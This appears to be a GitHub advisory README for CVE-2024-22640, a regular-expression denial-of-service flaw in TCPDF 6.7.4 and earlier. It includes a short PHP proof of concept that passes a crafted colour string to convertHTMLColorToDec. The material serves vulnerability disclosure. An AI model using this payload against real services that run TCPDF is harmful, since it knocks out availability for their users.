CVE-2024-22640

Vulnerability Type

Regular expression Denial of Service (ReDoS)

Affected Product and Version

TCPDF <= 6.7.4

Attack Vector

TCPDF parse HTML color contains crafted payload.

Description

TCPDF version <= 6.7.4 is vulnerable to ReDoS (Regular Expression Denial of Service) if parsing an untrusted HTML page with a crafted color.

PoC

<?php

require_once('../tcpdf.php');

$test = new TCPDF_COLORS();
$ref = "none";
$test -> convertHTMLColorToDec('["t"000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000!]',$ref);
?>

Note: Checking with preg_last_error() after the vulnerable line of code, the regEx will exit with PREG_BACKTRACK_LIMIT_ERROR.

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

README.md

README.md

CVE-2024-22640

Vulnerability Type

Affected Product and Version

Attack Vector

Description

PoC

Files

README.md

Latest commit

History

README.md

File metadata and controls

CVE-2024-22640

Vulnerability Type

Affected Product and Version

Attack Vector

Description

PoC